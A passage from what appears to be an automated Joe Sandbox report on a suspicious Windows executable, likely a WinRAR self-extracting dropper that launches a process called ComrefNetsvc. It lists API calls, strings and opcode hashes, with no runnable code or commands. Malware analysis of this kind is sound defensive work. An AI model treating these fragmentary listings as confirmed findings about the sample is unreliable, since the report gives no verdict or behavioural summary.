                                                                                  • Opcode Fuzzy Hash: 455659108e853fb66f060318a69579ec494d883f5eb43749cb019827f8a53a05
                                                                                  • Instruction Fuzzy Hash: C601923A525245AFCB10AF54FC48A967BA8F709354B100526F805832F2C7709C74DBE0
                                                                                  APIs
                                                                                    • Part of subcall function 0027E2E8: _swprintf.LIBCMT ref: 0027E30E
                                                                                    • Part of subcall function 0027E2E8: _strlen.LIBCMT ref: 0027E32F
                                                                                    • Part of subcall function 0027E2E8: SetDlgItemTextW.USER32(?,002AE274,?), ref: 0027E38F
                                                                                    • Part of subcall function 0027E2E8: GetWindowRect.USER32(?,?), ref: 0027E3C9
                                                                                    • Part of subcall function 0027E2E8: GetClientRect.USER32(?,?), ref: 0027E3D5
                                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                  • SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                  • String ID: ($0
                                                                                  • API String ID: 2622349952-1122952887
                                                                                  • Opcode ID: 3eccce0cf9ae93f1a4b5d06c5f724b70ce309d4ce639d5d6bcc5becc692e640a
                                                                                  • Instruction ID: aec566e580b6564d6bdb06860ae19c950ae10173c3442953e3d83fd3aa768a9d
                                                                                  • Opcode Fuzzy Hash: 3eccce0cf9ae93f1a4b5d06c5f724b70ce309d4ce639d5d6bcc5becc692e640a
                                                                                  • Instruction Fuzzy Hash: 77F0AF3052428AAADF155F68DC0EBEA3B78AF09384F04C596FC4C545A1CB74C9B0EA20
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00277F69,?,?,?), ref: 0027A3FA
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00277F69,?), ref: 0027A43E
                                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00277F69,?,?,?,?,?,?,?), ref: 0027A4BF
                                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,00277F69,?,?,?,?,?,?,?,?,?,?), ref: 0027A4C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 2287278272-0
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,002947C6,00000000,00000000,002957FB,?,002957FB,?,00000001,002947C6,2DE85006,00000001,002957FB,002957FB), ref: 0029C9D5
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0029CA5E
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0029CA70
                                                                                  • __freea.LIBCMT ref: 0029CA79
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                  • String ID:
                                                                                  • API String ID: 2652629310-0
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0028A666
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0028A675
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0028A683
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0028A691
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _wcschr
                                                                                  • String ID: .lnk$d(
                                                                                  • API String ID: 2691759472-2429978066
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 002775E3
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                    • Part of subcall function 0027A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A598
                                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0027777F
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A501
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A532
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                  • String ID: :
                                                                                  • API String ID: 3226429890-336475711
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _wcschr
                                                                                  • String ID: *
                                                                                  • API String ID: 2691759472-163128923
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: }
                                                                                  • API String ID: 176396367-4239843852
                                                                                  APIs
                                                                                    • Part of subcall function 0027F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027F2E4
                                                                                    • Part of subcall function 0027F2C5: GetProcAddress.KERNEL32(002B81C8,CryptUnprotectMemory), ref: 0027F2F4
                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0027F33E), ref: 0027F3D2
                                                                                  Strings
                                                                                  • CryptProtectMemory failed, xrefs: 0027F389
                                                                                  • CryptUnprotectMemory failed, xrefs: 0027F3CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentProcess
                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                  • API String ID: 2190909847-396321323
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _wcschr
                                                                                  • String ID: <9*$?*<>|"
                                                                                  • API String ID: 2691759472-4230767896
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: Software\WinRAR SFX$(
                                                                                  • API String ID: 176396367-2399739093
                                                                                  APIs
                                                                                    • Part of subcall function 0027C29A: _wcslen.LIBCMT ref: 0027C2A2
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00281FE5
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00281FF6
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00282006
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00282014
                                                                                    • Part of subcall function 00281FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0027B371,?,?,00000000,?,?,?), ref: 0028202F
                                                                                    • Part of subcall function 0028AC04: SetCurrentDirectoryW.KERNELBASE(?,0028AE72,C:\Users\user\Desktop,00000000,002B946A,00000006), ref: 0028AC08
                                                                                  • _wcslen.LIBCMT ref: 0028AE8B
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                  • String ID: <($C:\Users\user\Desktop
                                                                                  • API String ID: 521417927-1886305182
                                                                                  APIs
                                                                                    • Part of subcall function 002997E5: GetLastError.KERNEL32(?,002B1098,00294674,002B1098,?,?,002940EF,?,?,002B1098), ref: 002997E9
                                                                                    • Part of subcall function 002997E5: _free.LIBCMT ref: 0029981C
                                                                                    • Part of subcall function 002997E5: SetLastError.KERNEL32(00000000,?,002B1098), ref: 0029985D
                                                                                    • Part of subcall function 002997E5: _abort.LIBCMT ref: 00299863
                                                                                  • _abort.LIBCMT ref: 0029BB80
                                                                                  • _free.LIBCMT ref: 0029BBB4
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_abort_free
                                                                                  • String ID: p*
                                                                                  • API String ID: 289325740-4114540210
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Malloc
                                                                                  • String ID: (($Z(
                                                                                  • API String ID: 2696272793-2098410053
                                                                                  APIs
                                                                                    • Part of subcall function 0029BF30: GetEnvironmentStringsW.KERNEL32 ref: 0029BF39
                                                                                    • Part of subcall function 0029BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029BF5C
                                                                                    • Part of subcall function 0029BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029BF82
                                                                                    • Part of subcall function 0029BF30: _free.LIBCMT ref: 0029BF95
                                                                                    • Part of subcall function 0029BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029BFA4
                                                                                  • _free.LIBCMT ref: 002982AE
                                                                                  • _free.LIBCMT ref: 002982B5
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                  • String ID: 0"-
                                                                                  • API String ID: 400815659-960964311
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00281101,?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FEA
                                                                                  • GetLastError.KERNEL32(?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FF6
                                                                                    • Part of subcall function 00276C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276C54
                                                                                  Strings
                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00280FFF
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1091760877-2248577382
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0027DA55,?), ref: 0027E2A3
                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0027DA55,?), ref: 0027E2B1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: RTL
                                                                                  • API String ID: 3537982541-834975271
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E467
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: U($z(
                                                                                  • API String ID: 1269201914-2305032885
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E467
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e3094494d9ff94e6b743e8bec3fb2a4d8072ce1a19747f3e948c1e73715248e
                                                                                  • Instruction ID: 1c74fa8b311a32ca3627cd58aa5f51d20dee30605b0b2b4886588eb316b4c7aa
                                                                                  • Opcode Fuzzy Hash: 8e3094494d9ff94e6b743e8bec3fb2a4d8072ce1a19747f3e948c1e73715248e
                                                                                  • Instruction Fuzzy Hash: E771C330E1EE4E8EEB69DBA488646FC77E4EF55300F1105BAD02EC71E5DE3A69419701
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 251be0b30dfdf986f127fae77701cc5bb3f171d83c684a5350688e3be2f16ca3
                                                                                  • Instruction ID: 07f7de8d8ac33e36bd873bf96d52002ec7d6bba79204fbe65e7c97a9f6847494
                                                                                  • Opcode Fuzzy Hash: 251be0b30dfdf986f127fae77701cc5bb3f171d83c684a5350688e3be2f16ca3
                                                                                  • Instruction Fuzzy Hash: 2381A130A0AF0E8FD369DB54D1A457177E5FF04304B51857EC4AEC7AA6CA3AB942CB41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8fe05c4914784568d2c85579eabd44d468cecd8831939b313d64cb929f45c1dc
                                                                                  • Instruction ID: 82254d5428abab921ca04d00fdecda9479842808ef2887285639a07cc368a4c8
                                                                                  • Opcode Fuzzy Hash: 8fe05c4914784568d2c85579eabd44d468cecd8831939b313d64cb929f45c1dc
                                                                                  • Instruction Fuzzy Hash: 3071D430E1EE4E8FE7A5DBA488656BC7BB4EF55300F1101BED02ED71A2DA396A418701
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 108875c65e9df988b624c25af7728f205e9d9622c9e1329322b6132c9b3c1b67
                                                                                  • Instruction ID: 81391d998880498ddff4a8bdfda593c1e72d278163be8b27256c2d0e9bac3acd
                                                                                  • Opcode Fuzzy Hash: 108875c65e9df988b624c25af7728f205e9d9622c9e1329322b6132c9b3c1b67
                                                                                  • Instruction Fuzzy Hash: FC81D430A0AF0A8FD369CB54D0A457177E1FF44300B52457DC4ABC7AA2DA3AB942CB85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b5fec265f81350d6e13c6cad093783892d673e34d2b80920ee97c297f5920969
                                                                                  • Instruction ID: ec060c00fdbb71e6dfdcee73d8fdf5aad6d05872e21f46054260d757877353c7
                                                                                  • Opcode Fuzzy Hash: b5fec265f81350d6e13c6cad093783892d673e34d2b80920ee97c297f5920969
                                                                                  • Instruction Fuzzy Hash: B671F531E0EE4D5FEBA8DB6488656A87BE1FF16310F0041FED06DC72A2DE352A448B41
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a305e3ddbed0b1faef5ac31bedf939af85a592b108772d930249f804d8f125b
                                                                                  • Instruction ID: 0fd2ac94a8afa4a2b99c86df6e7f8b18bfb9e855d3da302409f0bc1925c5cd01
                                                                                  • Opcode Fuzzy Hash: 1a305e3ddbed0b1faef5ac31bedf939af85a592b108772d930249f804d8f125b
                                                                                  • Instruction Fuzzy Hash: 17511835F19D4D8FE7A8DF6C98A9A7833D1FF98310B050179E52EC76A2DE39A9018740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f6d52b05830787d57471133c438d93425ce298f3d11c35721a81f6cb6bdca45d
                                                                                  • Instruction ID: 5666d7295521db94541f26422b3306e36ce89cdd481218be7aa4e5bb7bb3512e
                                                                                  • Opcode Fuzzy Hash: f6d52b05830787d57471133c438d93425ce298f3d11c35721a81f6cb6bdca45d
                                                                                  • Instruction Fuzzy Hash: C351F732B09D0E4FE758DBACC0619B9B7A6FF84314B514279D06EC7292DF39B9128780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9b0db497811b89e21182651a24b4c5c1b17231a1b6fc39004ed4d9d3ce3963e0
                                                                                  • Instruction ID: 3a57878a7c87b7393380331242fe88803168399c5f3d5ece3cbc051a637f9610
                                                                                  • Opcode Fuzzy Hash: 9b0db497811b89e21182651a24b4c5c1b17231a1b6fc39004ed4d9d3ce3963e0
                                                                                  • Instruction Fuzzy Hash: EB51AE30B19D0A4FE799EB68C0A16A4B3E5FF58300F418279C01EC7A96DF39F9518B80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 304f4b09042d04c615d7a8565132db6e75a455453ef052c01e01150524d386b3
                                                                                  • Instruction ID: 454b70f75fda91f03794c7c1d5ccf6fdd6803f85d2f4770430bac6ce666361b5
                                                                                  • Opcode Fuzzy Hash: 304f4b09042d04c615d7a8565132db6e75a455453ef052c01e01150524d386b3
                                                                                  • Instruction Fuzzy Hash: 9F416B12B0D5691EE328B7BCA4AA5F97B81DF59336B0404FFD04ECB1E3CD0868418395
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e0fc7f7ba896c83c520945d7875cb46df8a898a9b7985acd639299e76ebc8722
                                                                                  • Instruction ID: 4f480afe1825eaf3b153b0c0736ac076d17459a0809563f7eca4fe9d4d1be029
                                                                                  • Opcode Fuzzy Hash: e0fc7f7ba896c83c520945d7875cb46df8a898a9b7985acd639299e76ebc8722
                                                                                  • Instruction Fuzzy Hash: 1C41F861A0FFCE0FE77756B448354A47FA4AF43210B0A11FBD09DCA0A3D96A5A46C352
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4beb49939bfe23f151f646cfe9a7c8ac4b9e5e395586c04b4503697f556a3ecd
                                                                                  • Instruction ID: 9a262d37a6fcf0728b57c56db25160735f84c4ce7c8329fab5dfca3f21101608
                                                                                  • Opcode Fuzzy Hash: 4beb49939bfe23f151f646cfe9a7c8ac4b9e5e395586c04b4503697f556a3ecd
                                                                                  • Instruction Fuzzy Hash: B4417F30E0DE4E8FDF95DB98C8A49AD7BB1FF59300F1501AAD01AD72A2CA35A905CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f98e1e06d76a0d295d2aef5bd532b7b2c9e8ef507dbd75a6dc0de387899a3685
                                                                                  • Instruction ID: 8db05231edd7dcdcad8bfef656b97f8441d685ebb8854504871de044ea0ec150
                                                                                  • Opcode Fuzzy Hash: f98e1e06d76a0d295d2aef5bd532b7b2c9e8ef507dbd75a6dc0de387899a3685
                                                                                  • Instruction Fuzzy Hash: B1311620B1E95D4FEBA8AB6884AA67577C2EF98320F0500BAE40DC32F3DD58AC418751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee31842daf8f345e684ad2341e3df035850a47c0efacfa9eb8eee96aa0a7e04c
                                                                                  • Instruction ID: 36e4e7ee3d83b7f4214e538a1c1981852baa450708e521a3d5504775c6bc8b39
                                                                                  • Opcode Fuzzy Hash: ee31842daf8f345e684ad2341e3df035850a47c0efacfa9eb8eee96aa0a7e04c
                                                                                  • Instruction Fuzzy Hash: 41413930A1DC6E8EEBB8CA9484757B877A1FF54304F1185F9C06EC71A6DD396A808781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0454a0d768363cd6cd19a28d019998ea5113ead929098659590c8aba2431491a
                                                                                  • Instruction ID: ebdd88959ce81ecedd8ee7bba791d0ea51ac73547adf25f36592ba7c6a52eeab
                                                                                  • Opcode Fuzzy Hash: 0454a0d768363cd6cd19a28d019998ea5113ead929098659590c8aba2431491a
                                                                                  • Instruction Fuzzy Hash: 17416F3260CD098FDF98EF58C4A5DA4B3E1FBA9360B0445AED05EC71A6DE31E945CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75201336a96b4f35d080659edca1471801c57f078f953fba39465cff02580ab5
                                                                                  • Instruction ID: b16149351f1cb902198e92f2063fb4def0aa949b186cab662f167f9ef0787ddb
                                                                                  • Opcode Fuzzy Hash: 75201336a96b4f35d080659edca1471801c57f078f953fba39465cff02580ab5
                                                                                  • Instruction Fuzzy Hash: 3C41503160DD088FDF99EF58C4A5DA4B3E1FBA9320B0402AAD05AC7196DE25ED458B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f882329a582f2bf4c741476da5bf6936b3af3c34fe914275f5e8f7db26b9f0a
                                                                                  • Instruction ID: 18cf392f0ef528c5f3336bbe4a3b44a7f407924644c53559d50519df9c7fdf5f
                                                                                  • Opcode Fuzzy Hash: 6f882329a582f2bf4c741476da5bf6936b3af3c34fe914275f5e8f7db26b9f0a
                                                                                  • Instruction Fuzzy Hash: 6641803260DD488FDF98EF58D4A5AA573E1FFA9320B0505AAD05EC7296DE31EC44CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b993d2e5b83dcffddeb215577ef128d8d806ecb9f71ae7a8e8a0c0fa6834dce
                                                                                  • Instruction ID: 3aac669749dfb571c361c212800c6eef4295307c52af8e2a072c5d7e481fbbd8
                                                                                  • Opcode Fuzzy Hash: 4b993d2e5b83dcffddeb215577ef128d8d806ecb9f71ae7a8e8a0c0fa6834dce
                                                                                  • Instruction Fuzzy Hash: 2231A03160CD488FDF98EF18C4A5D64B3E1FFA936470446AED05EC71A6DE21E844CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29080532a42eb325f2eb3fb6bf1223d943c257b58aab39abd4b3eb6ef4f3287f
                                                                                  • Instruction ID: 0e2bfc6b1886ed51d49594228b1d00385257c10212608eb649d0f85abca9e130
                                                                                  • Opcode Fuzzy Hash: 29080532a42eb325f2eb3fb6bf1223d943c257b58aab39abd4b3eb6ef4f3287f
                                                                                  • Instruction Fuzzy Hash: 20211031E19D5D9FDBA5DF98D8609BCB7B1FF58301F510539E02AE3290DE35A9058B40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0db294ff11ba96804ff4b0dfdf36ae4acb6697ef1d3068bf1319bc47a027ba51
                                                                                  • Instruction ID: 5512b0b960e16d30d0ea0a18c4a8fc46b6c9f284a7f7fa4169e7c35a7aa8b0a3
                                                                                  • Opcode Fuzzy Hash: 0db294ff11ba96804ff4b0dfdf36ae4acb6697ef1d3068bf1319bc47a027ba51
